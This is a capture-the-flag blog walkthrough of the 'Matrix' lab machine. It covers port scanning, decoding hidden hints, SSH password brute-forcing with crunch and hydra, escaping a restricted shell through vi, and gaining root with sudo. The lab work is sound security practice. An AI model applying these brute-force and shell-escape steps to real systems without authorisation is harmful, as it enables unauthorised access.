Lab – Matrix

The Matrix has you! Another quite easy machine to take down this monday. It’s more suitable as CTF, not a real life example, but however it’s really entertaining.

This time the machine boots to a nice welcome screen. But since we have no idea what the password is, it’s as neat as useless.

matrix_01

Now to enumeration:

root@kali:~# nmap -sV -sC -O -A 192.168.89.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-16 07:10 EDT
Nmap scan report for 192.168.89.130
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title: Welcome in Matrix
MAC Address: 00:0C:29:CB:4D:88 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.89.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.38 seconds

We’ve got a SSH access and two web servers – on standard 80 port and on some weird 31337. I wonder if 31337 has some reference to the movie.

Ok, let’s check out the website:

matrix_02

Hmm, nothing important. If we check the page source code we would find a reference to an image:

port_31337.png looks like this:

matrix_03

Oh, I get it, “Follow the white rabbit”. Number 31337 must means something important. Remember that we saw the web server on this port during initial scan. Let’s go there:

matrix_04

Another web page with no active content. In the page source there’s an interesting code:

It’s base64 encoded text, so it’s not hard to “decrypt” it:

root@kali:~# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

Here’s another movie quote and it points to some file with a matrix extension. Let’s try it then:

matrix_05

Pin right from a haystack. Cypher.matrix is indeed a file we can download and read. It reads, well ..

matrix_06

This is a Matrix =) It doesn’t make any sense but google suggests that this “thing” is written in brainfuck – an esoteric programming language created in 1993 by Urban Müller. I have no idea how to read this so just google for translation.

matrix_07

Got it. I think with correct login and password we can access the machine via SSH. We have to bruteforce the password since the author is so forgetful. I think the easiest way is to generate a password list and to use it with hydra. We have a clue from previous step, so we just need two characters:

root@kali:~# crunch 8 8 -t k1ll0r@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt
Crunch will now generate the following amount of data: 22500 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 2500

We have 2500 passwords so it might take some time:

root@kali:~# hydra -l guest -P mypassword.txt 192.168.89.130 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-16 08:07:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2500 login tries (l:1/p:2500), ~157 tries per task
[DATA] attacking ssh://192.168.89.130:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 2324 to do in 00:13h, 16 active
[STATUS] 166.67 tries/min, 500 tries in 00:03h, 2004 to do in 00:13h, 16 active
[STATUS] 151.43 tries/min, 1060 tries in 00:07h, 1444 to do in 00:10h, 16 active

[22][ssh] host: 192.168.89.130 login: guest password: k1ll0r7n

Ok, we have our correct password. Let’s use it with SSH:

root@kali:~# ssh guest@192.168.89.130
The authenticity of host '192.168.89.130 (192.168.89.130)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.89.130' (ECDSA) to the list of known hosts.
guest@192.168.89.130's password: 
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names

Something is wrong here. We’ve got an access but we have restricted access with rbash. In fact it’s a common way for administrator to limit things guest can run. Luckily there are ways to avoid this restriction:

guest@porteus:~$ echo /home/guest/prog/*
/home/guest/prog/vi

Great, we have vi. I hate vi except for moments like this one =) Let’s start vi and run a command:

:!/bin/bash

Now we are in a proper shell, but we’re still just a user. To escalate our privileges we can use simple command:

export PATH=/usr/bin:/bin

Got it, now let’s see what others can do:

guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
(ALL) ALL
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cp

It seems that we can just run sudo su now and try password that we already have:

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

root@porteus:/home/guest#

And it does the trick. Now where is our flag, Mr.Anderson?

root@porteus:/home/guest# cd /root
root@porteus:~# ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt
root@porteus:~# cat flag.txt 
   _,-. 
,-'  _|                EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._            INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.         IN THE MATRIX AND BEAT OFF 
|`-._`-.\,-'_|    _,-'. 
      `-.|.-'|   |`.-'|_   WHAT 
         |       |_|,-'_`. 
                |-._,-'  |   NO, ME NEITHER 
           jrei | |    _,' 
                '-|_,-'         IT'S JUST A HYPOTHETICAL QUESTION

Here it is.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s